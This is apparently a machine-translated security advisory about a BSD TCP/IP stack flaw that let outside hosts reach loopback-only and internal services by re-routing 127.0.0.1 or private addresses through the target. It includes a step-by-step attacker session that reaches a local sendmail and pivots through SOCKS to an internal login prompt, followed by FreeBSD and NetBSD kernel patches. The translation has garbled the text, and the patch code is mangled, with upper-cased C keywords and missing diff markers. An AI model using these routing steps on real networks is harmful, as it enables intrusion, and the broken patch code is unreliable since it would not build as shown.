Routing vulnerabilities in the TCP / IP stack (BSD, defect)
(Transfer from Tianluo Technology)
Recommended procedures:
Loopback and multi-homed
description:
Loopback and multi-homed routing vulnerability in the TCP / IP stack
detailed:
There is a vulnerability in the TCP / IP stack: the packets used to test the loop or network interface can obtain routes through other interfaces even if the machine is configured to not allow the route. This means that these services that are designed only to work within the machine and the external unavailable service can be utilized to provide services for external services. This can threaten the host or neighboring network through the buffer overflow.
**** The following code is only used to test and study this vulnerability. If you use it for improper ways, please pay your own negotiation ****
Assuming 213.129.64.x represents the public network, 172.16.x.x represents the internal private host. Server 213.129.64.1 Run sendamil on the 25th port to provide SMTP services to local programs. Attackers are on 213.129.64.2.
213.129.64.2 # Route delete 127.0.0.1
Delete Host 127.0.0.1
213.129.64.2 # Route Add 127.0.0.1 213.129.64.1
Add host 127.0.0.1 Gateway 213.129.64.1
213.129.64.2 # Telnet 127.0.0.1 25
Trying 127.0.0.1 ...
Connected to 127.0.0.1.
Escape Character is '^]'.
220 Eeek.woodyland.Not Esmtp Sendmail Blah Blah Blah BLAH
If 213.129.64.1 is only running the SOCKS service for its internal network 172.16.1.1:
213.129.64.2 # Route Add 172.16.1.1 213.129.64.1
213.129.64.2 # Add host 172.16.1.1: Gateway 213.129.64.1
213.129.64.2 # telnet 172.16.1.1 1080
Trying 172.16.1.1 ...
Connected to 172.16.1.1.
Escape Character is '^]'.
213.129.64.2 # export socks_server = 172.16.1.1
213.129.64.2 # RtelNet 172.16.1.2
Trying 172.16.1.2 ...
Connected to Kerpow.woodyland.Not Escape Character IS '^]'.
02/02/01 22:25:32 ON / dev / con1
Last login: 02/02/01 21:22:54 ON / dev / con1
Login:
Affected system:
FreeBSD
OpenBSD
NetBSD
solution:
FreeBSD4.2 has added patch:
--- /usr/src/sys/netinet/ip_input.c.org sun dec 17 16:04:49 2000
/usr/src/sys/netinet/ip_input.c MON DEC 18 16:46:14 2000
@@ -486, 7 486, 9 @@
IP_fw_fwd_addr-> sin_addr.s_addr)
Goto urs;
#ELSE
- IF (IA_SIN (IA) -> SIN_ADDR.S_ADDR == IP-> ip_dst.s_addr)
IF (IA_SIN (IA) -> sin_addr.s_addr == ip-> ip_dst.s_addr && (IA-> IA_IFP == m-> m_pkthdr.rcvif
|| M-> m_pkthdr.rcvif-> if_flags & iff_loopback))
Goto urs;
#ENDIF
IF (IA-> IA_IFP && IA-> IA_IFP-> if_flags & iff_broadcast)
{
OpenBSD: The patch has not been introduced.
Netbsd: Please enter the patch below into sys / netinet / ip_input.c
*** IP_INPUT.C 2001/03/01 16:31:39 1.128
--- IP_INPUT.C 2001/03/02 02:05:36 1.129
****************
*** 416, 421 ****
--- 416,428 ----
IF (IP-> IP_SRC.S_ADDR)) {
/ * Xxx stat * /
Goto Bad;
}
/ * 127/8 Must Not Appear on Wire - RFC122 * /
IF ((NTOHL (IP-> IP_DST.S_ADDR) >> in_classa_nshift) ==
IN_LOOPBACKNET ||
(NTOHL (IP-> IP_SRC.S_ADDR) >> in_classa_nshift) ==
IN_LOOPBACKNET) {
IF ((m-> m_pkthdr.rcvif-> if_flags & iff_loopback) == 0)
GOTO BAD;
}
IF (IN_CKSUM (M, HLEN)! = 0) {